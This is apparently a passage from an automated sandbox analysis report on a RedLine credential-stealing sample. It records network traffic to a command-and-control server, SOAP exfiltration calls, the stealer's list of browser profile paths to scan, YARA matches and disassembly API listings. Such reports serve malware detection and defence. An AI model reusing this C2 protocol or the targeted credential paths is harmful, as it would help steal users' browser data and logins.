Jun 24, 2024 18:24:36.434323072 CEST	7474	49711	185.38.142.10	192.168.2.7
Jun 24, 2024 18:24:36.434333086 CEST	7474	49711	185.38.142.10	192.168.2.7
Jun 24, 2024 18:24:36.434346914 CEST	7474	49711	185.38.142.10	192.168.2.7
Jun 24, 2024 18:24:36.434355974 CEST	7474	49711	185.38.142.10	192.168.2.7
Jun 24, 2024 18:24:36.434365034 CEST	7474	49711	185.38.142.10	192.168.2.7
Jun 24, 2024 18:24:36.434371948 CEST	7474	49711	185.38.142.10	192.168.2.7
Jun 24, 2024 18:24:36.434381008 CEST	7474	49711	185.38.142.10	192.168.2.7
Jun 24, 2024 18:24:36.434387922 CEST	7474	49711	185.38.142.10	192.168.2.7
Jun 24, 2024 18:24:36.477176905 CEST	7474	49711	185.38.142.10	192.168.2.7
Jun 24, 2024 18:24:37.647245884 CEST	7474	49711	185.38.142.10	192.168.2.7
Jun 24, 2024 18:24:37.667515039 CEST	49711	7474	192.168.2.7	185.38.142.10
Jun 24, 2024 18:24:37.667557001 CEST	49710	7474	192.168.2.7	185.38.142.10

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 24, 2024 18:24:31.256983042 CEST	65200	53	192.168.2.7	1.1.1.1

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jun 24, 2024 18:24:31.256983042 CEST	192.168.2.7	1.1.1.1	0x85b8	Standard query (0)	api.ip.sb	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jun 24, 2024 18:24:31.265333891 CEST	1.1.1.1	192.168.2.7	0x85b8	No error (0)	api.ip.sb	api.ip.sb.cdn.cloudflare.net		CNAME (Canonical name)	IN (0x0001)	false

HTTP Request Dependency Graph

185.38.142.10:7474

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49708	185.38.142.10	7474	7632	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 18:24:24.632993937 CEST	239	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/CheckConnect" Host: 185.38.142.10:7474 Content-Length: 137 Expect: 100-continue Accept-Encoding: gzip, deflate Connection: Keep-Alive
Jun 24, 2024 18:24:25.277416945 CEST	25	IN	HTTP/1.1 100 Continue
Jun 24, 2024 18:24:25.401972055 CEST	359	IN	HTTP/1.1 200 OK Content-Length: 212 Content-Type: text/xml; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Date: Mon, 24 Jun 2024 16:24:25 GMT Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 74 72 75 65 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnectResponse xmlns="http://tempuri.org/"><CheckConnectResult>true</CheckConnectResult></CheckConnectResponse></s:Body></s:Envelope>
Jun 24, 2024 18:24:30.463136911 CEST	222	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings" Host: 185.38.142.10:7474 Content-Length: 144 Expect: 100-continue Accept-Encoding: gzip, deflate
Jun 24, 2024 18:24:30.754394054 CEST	25	IN	HTTP/1.1 100 Continue
Jun 24, 2024 18:24:31.208231926 CEST	1236	IN	HTTP/1.1 200 OK Content-Length: 4744 Content-Type: text/xml; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Date: Mon, 24 Jun 2024 16:24:31 GMT Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 3e 3c 61 3a 42 6c 6f 63 6b 65 64 43 6f 75 6e 74 72 79 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 2f 3e 3c 61 3a 42 6c 6f 63 6b 65 64 49 50 20 78 6d 6c [TRUNCATED] Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><EnvironmentSettingsResponse xmlns="http://tempuri.org/"><EnvironmentSettingsResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><a:BlockedCountry xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:BlockedIP xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:Object4>true</a:Object4><a:Object6>false</a:Object6><a:ScanBrowsers>true</a:ScanBrowsers><a:ScanChromeBrowsersPaths xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><b:string>%USERPROFILE%\AppData\Local\Battle.net</b:string><b:string>%USERPROFILE%\AppData\Local\Chromium\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Google\Chrome\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Google(x86)\Chrome\User Data</b:string><b:string>%USERPROFILE%\AppData\Roaming\Opera Software\</b:string><b:string>%USERPROFILE%\AppData\Local\MapleStudio\ChromePlus\User Data</b:string [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49710	185.38.142.10	7474	7632	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 18:24:34.209909916 CEST	220	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment" Host: 185.38.142.10:7474 Content-Length: 937317 Expect: 100-continue Accept-Encoding: gzip, deflate
Jun 24, 2024 18:24:35.956576109 CEST	294	IN	HTTP/1.1 200 OK Content-Length: 147 Content-Type: text/xml; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Date: Mon, 24 Jun 2024 16:24:35 GMT Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 53 65 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 2f 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><SetEnvironmentResponse xmlns="http://tempuri.org/"/></s:Body></s:Envelope>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	49711	185.38.142.10	7474	7632	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jun 24, 2024 18:24:35.964489937 CEST	240	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/GetUpdates" Host: 185.38.142.10:7474 Content-Length: 937309 Expect: 100-continue Accept-Encoding: gzip, deflate Connection: Keep-Alive
Jun 24, 2024 18:24:37.647245884 CEST	408	IN	HTTP/1.1 200 OK Content-Length: 261 Content-Type: text/xml; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Date: Mon, 24 Jun 2024 16:24:37 GMT Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 2f 3e 3c 2f 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdatesResponse xmlns="http://tempuri.org/"><GetUpdatesResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/></GetUpdatesResponse></s:Body></s:Envelope>

Target ID:	1
Start time:	12:24:21
Start date:	24/06/2024
Path:	C:\Users\user\Desktop\YPSvIjQCzd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\YPSvIjQCzd.exe"
Imagebase:	0x7d0000
File size:	644'096 bytes
MD5 hash:	901A623DBCCAA22525373CD36195EE14
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.1345378402.0000000001500000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000001.00000002.1345378402.0000000001500000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000001.00000002.1345378402.0000000001500000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000001.00000002.1345378402.0000000001500000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	12:24:22
Start date:	24/06/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\YPSvIjQCzd.exe"
Imagebase:	0xa00000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.1480270706.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000003.00000002.1480270706.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000003.00000002.1480270706.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	12:24:22
Start date:	24/06/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	4.1%
Dynamic/Decrypted Code Coverage:	0.4%
Signature Coverage:	4.9%
Total number of Nodes:	2000
Total number of Limit Nodes:	57

Executed Functions

Function 007D3B4C Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 153
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 007D3B7A
IsDebuggerPresent.KERNEL32 ref: 007D3B8C
GetFullPathNameW.KERNEL32(00007FFF,?,?,008962F8,008962E0,?,?), ref: 007D3BFD

Part of subcall function 007D7D2C: _memmove.LIBCMT ref: 007D7D66

Part of subcall function 007E0A8D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,007D3C26,008962F8,?,?,?), ref: 007E0ACE

SetCurrentDirectoryW.KERNEL32(?), ref: 007D3C81
MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,008893F0,00000010), ref: 0080D4BC
SetCurrentDirectoryW.KERNEL32(?,008962F8,?,?,?), ref: 0080D4F4
GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00885D40,008962F8,?,?,?), ref: 0080D57A
ShellExecuteW.SHELL32(00000000,?,?), ref: 0080D581

Part of subcall function 007D3A58: GetSysColorBrush.USER32(0000000F), ref: 007D3A62
Part of subcall function 007D3A58: LoadCursorW.USER32(00000000,00007F00), ref: 007D3A71
Part of subcall function 007D3A58: LoadIconW.USER32(00000063), ref: 007D3A88
Part of subcall function 007D3A58: LoadIconW.USER32(000000A4), ref: 007D3A9A
Part of subcall function 007D3A58: LoadIconW.USER32(000000A2), ref: 007D3AAC
Part of subcall function 007D3A58: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 007D3AD2
Part of subcall function 007D3A58: RegisterClassExW.USER32(?), ref: 007D3B28

Part of subcall function 007D39E7: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 007D3A15
Part of subcall function 007D39E7: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 007D3A36
Part of subcall function 007D39E7: ShowWindow.USER32(00000000,?,?), ref: 007D3A4A
Part of subcall function 007D39E7: ShowWindow.USER32(00000000,?,?), ref: 007D3A53

Part of subcall function 007D43DB: _memset.LIBCMT ref: 007D4401
Part of subcall function 007D43DB: Shell_NotifyIconW.SHELL32(00000000,?), ref: 007D44A6

Strings

runas, xrefs: 0080D575
This is a third-party compiled AutoIt script., xrefs: 0080D4B4

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
String ID: This is a third-party compiled AutoIt script.$runas
API String ID: 529118366-3287110873
Opcode ID: 2719f7cbcb14e82b87da1f9c1c3b18abff9eb813a7dc59b67b3eeb96eb32c721
Instruction ID: 7e322772aef15547ef51dd6321948b7dd4821c4c01d97fe55a5efa4dba071bbf
Opcode Fuzzy Hash: 2719f7cbcb14e82b87da1f9c1c3b18abff9eb813a7dc59b67b3eeb96eb32c721
Instruction Fuzzy Hash: B751C170E18248EACF15BBF4DC09AED7B79FB04340B084167F559A23A2EA7C5655CB22

Function 007D3633 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151
timewindowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtdllDefWindowProc_W.NTDLL(?,?,?,?), ref: 007D36D2
KillTimer.USER32(?,00000001), ref: 007D36FC
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 007D371F
RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 007D372A
CreatePopupMenu.USER32 ref: 007D373E
PostQuitMessage.USER32(00000000), ref: 007D375F

Strings

TaskbarCreated, xrefs: 007D3725

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: Timer$ClipboardCreateFormatKillMenuMessageNtdllPopupPostProc_QuitRegisterWindow
String ID: TaskbarCreated
API String ID: 157504867-2362178303
Opcode ID: 8dcc586e5f2cadc467685a7cdf5f5c1ecfa447e580126f63f76e93122659dae4
Instruction ID: 9b2628e573445f66b260f568f665c156e9559f9d425c0a25fe1954f03534050f
Opcode Fuzzy Hash: 8dcc586e5f2cadc467685a7cdf5f5c1ecfa447e580126f63f76e93122659dae4
Instruction Fuzzy Hash: 7A4107B1204645BBDF106BA8EC49B793B75FB04351F18012BF602D63E2EA7CED649663

Function 007D4AFE Relevance: 10.7, APIs: 7, Instructions: 223
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 007D4B2B

Part of subcall function 007D7D2C: _memmove.LIBCMT ref: 007D7D66

GetCurrentProcess.KERNEL32(?,0085FAEC,00000000,00000000,?), ref: 007D4BF8
IsWow64Process.KERNEL32(00000000), ref: 007D4BFF
GetNativeSystemInfo.KERNELBASE(00000000), ref: 007D4C45
FreeLibrary.KERNEL32(00000000), ref: 007D4C50
GetSystemInfo.KERNEL32(00000000), ref: 007D4C81
GetSystemInfo.KERNEL32(00000000), ref: 007D4C8D

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
String ID:
API String ID: 1986165174-0
Opcode ID: d42050ca5fa505f17f097de4ca42328ca034010b5de9df99b71d80f1022cf989
Instruction ID: 2c0ed613333ba568ea370f88adb8839f01d89dae197e55eaa536788de5ea7351
Opcode Fuzzy Hash: d42050ca5fa505f17f097de4ca42328ca034010b5de9df99b71d80f1022cf989
Instruction Fuzzy Hash: 0291B17154ABC0DBC731DB68C9511AABFF5BF36300B48495FD0CA93B42D239A908C729

Function 007D4FE9 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,007D4EEE,?,?,00000000,00000000), ref: 007D5010
LoadResource.KERNEL32(?,00000000,?,?,007D4EEE,?,?,00000000,00000000,?,?,?,?,?,?,007D4F8F), ref: 0080DD60
SizeofResource.KERNEL32(?,00000000,?,?,007D4EEE,?,?,00000000,00000000,?,?,?,?,?,?,007D4F8F), ref: 0080DD75
LockResource.KERNEL32(N},?,?,007D4EEE,?,?,00000000,00000000,?,?,?,?,?,?,007D4F8F,00000000), ref: 0080DD88

Strings

N}, xrefs: 0080DD85
SCRIPT, xrefs: 007D5006

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: Resource$FindLoadLockSizeof
String ID: SCRIPT$N}
API String ID: 3473537107-3432425373
Opcode ID: 0d203d4eab4a089bc3dd6714bcbfc850aecfd5850ed7b7d80f023a2ab1d45380
Instruction ID: 286521a997317d77c8634f8de2f48f7929bba1bbc811fad1ab6f0385b65e4023
Opcode Fuzzy Hash: 0d203d4eab4a089bc3dd6714bcbfc850aecfd5850ed7b7d80f023a2ab1d45380
Instruction Fuzzy Hash: 0D115AB5200700BFD7218B65DC58F677BB9FBC9B12F208169F506C62A0DB65E8008661

Function 008EF090 Relevance: 7.7, APIs: 5, Instructions: 206
librarymemoryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(?), ref: 008EF1CA
GetProcAddress.KERNEL32(?,008E8FF9), ref: 008EF1E8
ExitProcess.KERNEL32(?,008E8FF9), ref: 008EF1F9
VirtualProtect.KERNELBASE(007D0000,00001000,00000004,?,00000000), ref: 008EF247
VirtualProtect.KERNELBASE(007D0000,00001000), ref: 008EF25C

Memory Dump Source

Source File: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: ProtectVirtual$AddressExitLibraryLoadProcProcess
String ID:
API String ID: 1996367037-0
Opcode ID: cd21c5ed9da329eaefcc786ece116525b8dc73cc06a546bbac0fc6900807ab08
Instruction ID: 558d7c50e809124a6ba12b22e3e22e37e619eead66cf00e85b168bc014419e07
Opcode Fuzzy Hash: cd21c5ed9da329eaefcc786ece116525b8dc73cc06a546bbac0fc6900807ab08
Instruction Fuzzy Hash: 58510672A54BDA9BD7229EB9CCC066077A4FB53324B280739D7E1C73C7E7A458068760

Function 00834696 Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,0080E7C1), ref: 008346A6
FindFirstFileW.KERNELBASE(?,?), ref: 008346B7
FindClose.KERNEL32(00000000), ref: 008346C7

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID: FileFind$AttributesCloseFirst
String ID:
API String ID: 48322524-0
Opcode ID: 83cee553ec7d0a7af099f763678ea0b16a44610a801db79da5126a6238751d71
Instruction ID: dbd3b94450a7410cdb7c84936b128844955b724105c0a5e3dcb90f95e538d35a
Opcode Fuzzy Hash: 83cee553ec7d0a7af099f763678ea0b16a44610a801db79da5126a6238751d71
Instruction Fuzzy Hash: 76E0D8314145005B62106B38EC4E4EA775CFE57336F100715FA35C21F0F7B46D5085D6

Function 007DE800 Relevance: 2.4, Strings: 1, Instructions: 1102COMMON

Download Yara Rule

Strings

Variable must be of type 'Object'., xrefs: 0081428C

Memory Dump Source

Source File: 00000001.00000002.1344759190.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000001.00000002.1344687893.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.000000000088F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1344759190.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345074943.00000000008EF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1345092206.00000000008F0000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7d0000_YPSvIjQCzd.jbxd

Similarity

API ID:
String ID: Variable must be of type 'Object'.
